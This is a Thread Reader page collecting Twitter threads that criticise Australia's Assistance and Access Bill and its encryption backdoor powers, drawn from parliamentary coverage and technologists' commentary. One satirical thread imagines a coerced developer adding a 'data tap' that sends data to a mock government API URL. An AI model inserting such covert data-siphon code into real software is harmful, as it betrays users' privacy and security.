Discover and read the best of Twitter Threads about #AAbill

Most recents (24)

1/ Ok, well it's time to lay out my biggest concerns on #aabill. IANAL, but I'm a technologist, entrepreneur, and investor. Please get your own legal advice - keeping in mind much of this will be an expensive fight in the courts...
2/ Scope of the crimes. The #aabill covers crimes of 3+ years state, federal, **and foreign**. Yes, you can get 5 to 10 years jail for refusing to comply with #aabill... for a 3-year crime. Indeed, you can be targeted by #aabill for breaking #aabill.
3/ Scope of the "Designated Communications Provider." People seem to think this only covers messaging. It's much broader than that, covering most software, hardware, and networking. It includes software updates. Yes, an individual can be a DCP.
Read 9 tweets
Australia rushed through an anti-#crypto bill last week. @HRW just released a game that shows what might happen if authorities use the law to gut key security features in the phones & apps we use every day:… #EverydayEncryption #AAbill
Do you shop online or message with friends on WhatsApp or iMessage? Ever shared an intimate photo with your partner? Organized a protest? #Encryption protects that data from malicious hackers & govt snoops #EverydayEncryption
Choose your own adventure: See if you can safely guide a character Fei as she makes choices about her data, and find out how #EverydayEncryption might protect you:…
Read 11 tweets
(Reasonably) educated thread about the options global companies like Apple have going forward now the #aaBill will happen in Australia.

I’ll start with my assumptions then explain their options #Auspol

1. Company will not compromise its core business strategy. Eg: for Apple this is sell devices/storage that are guaranteed to be secure. To point they won’t let the FBI in.
2. If you sell a product in Australia that is *same* as your global product then any engineered vulnerabilities* will impact global product.

*Australia doesn’t want to use term “back door” so let’s call it malware.
Read 6 tweets
No, not really. Not at all. I’ve seen quite a few tweets linking to this story. The Assistance & Access Bill certainly has problems, yes, but the way it’s characterised here is way off mark. In two key ways, I think... #aabill
First, it’s not “do whatever else it takes to decrypt subjects’ messages”. There’s a slab of stuff about having to be “reasonable, proportionate, practicable, and technically feasible”, and considering the likely business impact on the provider and wider public interests. #aabill
Obviously how that would pan out in practice remains to be seen, so expect some lively legal action for that! #aabill
Read 22 tweets
They passed that fucking #AABill anti-encryption law.

We're all fucked.


Here's a great example: some bright fuckwit at Police HQ thinks
"🤔 Hmm I need to see that person's bank transactions because they might, maybe, possibly a terrorist! (actually I dunno ¯\_(ツ)_/¯)...
Hey, Bank; you must insert a back door so I can access their accounts. And you can't tell anyone."

Now there's a huge gaping fucking hole in the fence around our online banking for anyone (not just Fuckwit Policeman #1) to gain access to our bank accounts.
Here's another one: some bright spark is inevitably going to ask Apple to make a back door into their iPhones.
Read 12 tweets
Over in Australia they’re shooting themselves in the face with a shockingly technically nonsensical encryption backdoor law. Doesn’t even help it just poison-pills their entire domestic tech industry, breaks imports.

Send prayers to the kangaroo punchers with copper internet. 🙏
Update: sounds like #aabill was shelved until 2019? Is that true?
Wow there’s a senator up talking about how 90% of Internet communications are encrypted and that’s a problem.


They’re talking about HTTPS.
Oh lawd.

Read 7 tweets
Now Senator Jordan Steele-John is speaking on the #aabill in the Senate…
The lies and the stupidity that has strewn forth from the opposition were laughable and sickening. It showed for all to see the depths to which they will stoop to avoid any possible imputation that they might be do anything other than be in a lock step with the government.
This is a piece of legislation dreamed up by a sinister public servant (Michael Pezzullo) driven by a bankrupt government and a laughable opposition. BUT I WARN YOU NOW. THERE IS A WHOLE INTERNET OUT THERE AND YOU ARE BEING WATCHED. THE INTERNET REMEMBERS.
Read 5 tweets
If you’re just tuning in to #auspol, let me catch you up on the high-stakes poker game the Govt and Opp have going here:

Coalition has a choice: prevent Labor & x-bench amended bill that would get #kidsoffnauru from reaching the Reps for a vote (which it would likely lose) – but in doing so also prevent final passage of #aabill (#encryption).
At the moment, parliamentary procedures are being used in Senate by Coalition, Bernardi & Hanson to delay getting to point where #kidsoffnauru amendments are voted on. Some filibustering going on, though Senate President is trying to curtail it.
Read 5 tweets
So, the #aabill passes, what does that mean?

I'm going to hypothesise and talk slightly outside my area of expertise, but bear with me
Does this mean encryption is going to be broken in Australia?
Nah, probably not. If you want to intercept end-to-end encrypted messages (iMessage, WhatsApp, Signal etc), the easier place to do this is at the endpoints, not in the middle
Back-dooring all the various messenger apps would be a massive, global change, and would involve authorities playing whack-a-mole as their targets move to new apps and protocols
Read 10 tweets
Ok. A third thread updating where things are at on the #aabill...
Since my last thread, the government came back to the negotiating table in the PJCIS and agreed to a series of amendments to the bill designed to prevent the issuance of Technical Capability Notices that could undermine strong encryption.
These amendments have been intensely negotiated with the government in a process that has been far from ideal, which is why Labor also secured agreement to continue scrutiny of the Bill through the PJCIS into 2019 and via the Independent National Security Legislation Monitor.
Read 25 tweets
Now amendments 1-173 to the #AAbill are being moved TOGETHER AS A BLOCK. THAT IS ONE HUNDRED AND SEVENTY THREE AMENDMENTS WILL BE MOVED AS A BLOCK. This is shoddy lawmaking in the extreme.…
The explanatory memorandum on these amendments has just been tabled. About 11 minutes before the complex and exhausting amendments are debated and voted on. Get in the bin @AustralianLabor Get In The Bin.
Labor got the amendments at 6.30 am, and they were put online after 9 am. Tony Burke is explaining why he is an invertebrate and should get in the bin.
Read 5 tweets
And now @WilkieMP is up to speak on the #aabill…
It is a bad idea to build a known vulnerability into encryption software says @WilkieMP To design a vulnerability, a weakness, access, is an invitation to wrongdoers to find the key and eavesdrop or see what people thought was a secure communication #aabill
What will our security partners and our business partners think of that? I think it is a reasonable conclusion to draw that there will be concern in other countries and business with operations in Australia with vulnerabilities in our ICT.
Read 8 tweets
Ed Husic now explains how the UK took its time to discuss this kind of legislation, unlike Oz with #AAbill. Provides helpful analogy - If you cut a tiny hole in the mozzie net and expect to not get bitten - you are foolish. And then Labor cuts the hole. Idiots.
Ed Husic explains that he opposed metadata legislation and is incredulous at the scope creep and scale (350,000 requests) of metadata - even by local councils! He describes judicial oversight under this bill as tissue tough. Right you are Ed.
Most of the government are so technically incompetent that if they can use the TV remote control it's a great tech achievement for them, says Ed Husic. This sensible guy certainly has a tech clue but will vote this shit law through because misled by invertebrate @markdreyfusQCMP
Read 3 tweets
HOORAY - now @AdamBandt will speak some sense - the #AAbill undermines our tech industry and civil liberties. Once you create a door into otherwise secure and encrypted communications, you cannot know who else will access it.…
He explains that in other countries, the threat of secure communications no longer being secure has outweighed the perceived 'benefits'. In requiring weakness by law, you lose control over who can exploit that weakness.
There is no such thing as requiring companies to unlock encryption that doesn't create systemic weakness. What the #AABill does is not only request tech companies to assist, but to actively change their software and product.
Read 7 tweets
Invertebrate @markdreyfusQCMP currently speaking on the #AABill in the House of Reps…
Invertebrate @markdreyfusQCMP explains how shoddy the process on this bill has been, its lack of definitions, and how important encryption is. This doublespeak comes immediately prior to weakening encryption and Australia's tech sector. The hypocrisy is astounding and vile.
Invertebrate @markdreyfusQCMP confesses that there is still discussion underway about what "systemic weakness" is. Labor is about to pass this bucket and amendments are still being hammered out. It's a debacle and Not How Gravely Important Laws Should Be Made You Idiots. #AAbill
Read 4 tweets
Debate on #aabill getting underway in the House of Reps. You can watch here.…
Shadow AG Mark Dreyfus security of the community must be "paramount" in parliament and Labor has shown it puts national security ahead of partisan politics.
He says national security agencies must be given powers they need to keep Australians safe, but must be proportionate, and with appropriate oversight.
Read 13 tweets
Thread: Today, everyday Aussies must stand up NOW and hold the line and call and/or email Labour MP's & Senators - incl Cross bench, and say "I oppose the #aabill" to protect and #Defendencryption Audience Q: Why should I?
A: Read the articles / tweets written by the experts and scholars who work and study in this field. For ease I have retweeted and liked their tweets in my timeline (it is not an exhaustive list). These are the people fighting for our human rights in digital rights & privacy.
These are the warriors trying to keep Aussie's safe by making submissions to Govt as experts, explaining the danger in the #AAbill by breaking encryption. Everyday Aussie's might argue, "I have nothing to hide" or "I don't use encryption"
Read 12 tweets
I've been talking to/listening to a lot of very smart tech people tonight, about #AAbill. Without exception, they are all furious, horrified, scared, or all three. Genuine fears this could hobble Aus tech industry, and surveillance used for far more than just serious crime
As a starting point, read @dobes clear explainer on what's going on and what the bill could mean…
Second, the claimed need to rush this through before Christmas is a moot point - it will take more than a month for anything to even change, and that's taking for granted that tech companies will agree to do so
Read 6 tweets
The amendments recommended from the committee in regards to the #aaBill are not sufficient and should be not be passed, When the government and @AustralianLabor have failed to tell the public why there is the immediate need for this bill. I am strongly worried.
That the passage of this bill will have grave consequences for the industry and all industries that rely on technology, given that evidence provided showed that...
1) Applications expected to be targeted such as WhatsApp are not under Australian jurisdiction and 2) Encryption used such as End-To-End encryption CAN NOT BE BROKEN WITH OUT WEAKENING THE ENCRYPTION ITS SELF OR BUILDING BACKDOORS that would threaten every Australian
Read 11 tweets
I’ve been asked for some talking points for non-technical people (like MPs, fr’instance) to demonstrate why the #aabill is no good.

Here’s a thread with my top 5. Please plagiarise and re-mix to your heart’s content.

1 of 5
1: The bill is bad for security because encryption keeps us safe from criminals. This bill will make it easier for them to hack us.

2: * The bill is bad for jobs because software companies will choose not to work in Australia, as this bill is fundamentally incompatible with GDPR.

Read 6 tweets
One of the ways #AABill gets access to systems is by commandeering employees of companies to write backdoors. But they’re not even allowed to tell their employer, or face jail time.

I went through the mechanics of this, and realised how out of touch Canberra is...
Let’s say they coerce a backend end dev to write a data tap. A few lines of code here and there, write to a file or connect straight to http://@ASDGovAu/api/vacuum/

Now what? Most devs don’t have access to production! Hilarity ensues...
The dev is now going to somehow commit this to the repo in order to get it through the pipelines.

First thing is CI/CD will reject the commit because there’s no JIRA ticket for the change.

Ok, let’s slip it under another ticket. Nope! Test harness no longer passes!
Read 18 tweets
The #aabill is incredibly short-sighted & luddite. Even if the AU Gov. can coerce tech companies to backdoor encrypted messaging platforms, nothing's going to stop people from resorting to using free & opensource #crypto software like @GnuPG! #auspol 1/
Popular #crypto software is trusted because it's been written & vetted by members of a decentralized #opensource community which you can't coerce. If you want to make it illegal to possess @GnuPG in Australia because you can't backdoor it, then you'll kill the IT industry. 2/
Software devs/engineers use #crypto daily to safeguard the apps & systems we code & run against malicious tampering. The #InfoSec community also needs to be confident it can discuss and coordinate responses to security vulnerabilities before they can be patched in private. 3/
Read 11 tweets
@mcannonbrookes Here’s my device maker’s and app writer’s guide to implementing #AABill in #ozcyber. The answer is a little nuanced & depends on what you’re trying to get at. I’ll also mention how you can protect yourself against it down below.
@mcannonbrookes The dirty way is to implement backdoors, in essence a backdoor-API. That API would need to be exposed, and would technically violate all encryption standards I know off and make the app/device un-certifiable for use in regulated industry.
@mcannonbrookes The cleanest way is for them to take a copy or a derived key for the encryption used. Like physical keys, they’d need to keep them somewhere safe; they can be copied; and they're easy to find.
Read 11 tweets
As a pen tester, here is what concerns me most about the #aabill: my job is to seek out vulnerabilities in clients' software, and then report them to the client.
As far as I understand it, the #aabill seems to be saying that if I find and write about one that the government put there, it's... my fault?
Then, of course, if you were a company who had been ordered to include a not-a-backdoor into your software, you probably wouldn't want pen testing done because this vuln isn't legally allowed to be found, and during a pen test it _would_ be...
Read 20 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!